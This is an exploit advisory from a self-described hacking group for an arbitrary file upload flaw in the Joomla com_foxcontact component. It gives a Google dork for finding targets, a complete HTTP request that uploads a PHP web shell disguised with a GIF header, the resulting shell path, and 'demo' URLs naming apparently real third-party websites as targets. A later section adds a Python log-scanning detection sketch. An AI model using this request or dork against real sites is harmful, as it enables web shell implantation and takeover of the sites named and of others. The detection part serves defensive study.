##########################
# Exploit Title: Joomla Component Arbitrary File Upload Shell Vulnerability
# Dork Google: allinurl:index.php?option=com_foxcontact
# We Are Iranian Anonymous
# Home: Iranonymous.org
# Discovered By: Hacker Khan
# Vendor Home: http://www.fox.ra.it/
# Version: 1.0
# Tested on: Linux-Windows7
##########################
# Exploit
-HTTP Header Example-
POST http://www.cavedegruissan.com/particulars/components/com_foxcontact/lib/file-uploader.php?cid=289&mid=0&qqfile=shell.php HTTP/1.1
Host: www.cavedegruissan.com
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-File-Name: shell.php
Content-Type: image/jpeg
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

GIF89a<?php shell ?>
############################
Shell path:
www.site.com/components/com_foxcontact/uploads/filename.php
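
Detection sketch for the request and shell path above, added here as an example and not part of the original advisory. It flags access-log lines where file-uploader.php receives a qqfile name with a script extension, flags requests for scripts under the uploads directory, and checks a stored file for the GIF-header-plus-PHP body shown in the request. The function names, the extension list, the "combined" log format and the sample log lines are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

UPLOADER = "/components/com_foxcontact/lib/file-uploader.php"
UPLOAD_DIR = "/components/com_foxcontact/uploads/"
# Extensions a PHP handler may execute (assumed list; match it to the server config).
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)(\.|$)", re.I)
# Apache/nginx "combined" log format, up to the status code (assumed format).
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" (\d{3})')

def classify(line):
    """Return (client_ip, finding) for a suspicious log line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, target, _status = m.groups()
    url = urlsplit(target)
    if method == "POST" and url.path.endswith(UPLOADER):
        # The request above passes the file name in the qqfile query parameter.
        names = parse_qs(url.query).get("qqfile", [])
        if any(SCRIPT_EXT.search(n) for n in names):
            return ip, "script-upload"
    elif UPLOAD_DIR in url.path and SCRIPT_EXT.search(url.path.rsplit("/", 1)[-1]):
        # Any request for a script inside the upload directory.
        return ip, "script-in-uploads"
    return None

def is_image_php_polyglot(data):
    """True for a file that starts with GIF magic bytes but embeds a PHP open tag."""
    return data[:6] in (b"GIF87a", b"GIF89a") and b"<?php" in data.lower()

# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2014:10:00:00 +0000] "POST /components/com_foxcontact/lib/file-uploader.php?cid=289&mid=0&qqfile=cv.pdf HTTP/1.1" 200 32',
    '192.0.2.77 - - [01/Jan/2014:10:05:00 +0000] "POST /components/com_foxcontact/lib/file-uploader.php?cid=289&mid=0&qqfile=shell.php HTTP/1.1" 200 32',
    '192.0.2.77 - - [01/Jan/2014:10:05:09 +0000] "GET /components/com_foxcontact/uploads/shell.php HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2014:10:06:00 +0000] "GET /index.php?option=com_foxcontact&view=foxcontact HTTP/1.1" 200 9000',
]

def scan(lines):
    """Classify every line and keep only the findings."""
    return [hit for hit in map(classify, lines) if hit]

if __name__ == "__main__":
    for ip, finding in scan(SAMPLE_LOG):
        print(ip, finding)
```

The Content-Type header and the leading GIF89a bytes are both supplied by the client, so neither is evidence that an upload is an image; the file name extension and the PHP open tag are the signals checked here.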
###########################
Demo:
http://www.cavedegruissan.com/component/hikashop/FT/index.php?option=com_foxcontact&view=foxcontact&Itemid=131
http://www.nebulaagencies.com.au/index.php?option=com_foxcontact&view=foxcontact&Itemid=113
##############################
# Thanks to: MR.Khatar || ll_azab-siyah_ll || Rising || Blackwolf_Iran || Ormazd || Sh@d0w ||
MaMaD_Malware || OnE_H4Ck3R || Shdmehr || B.D Happy Boy || MR.zarvan || Security Soldier ||
And All Of Iranian Anonymous.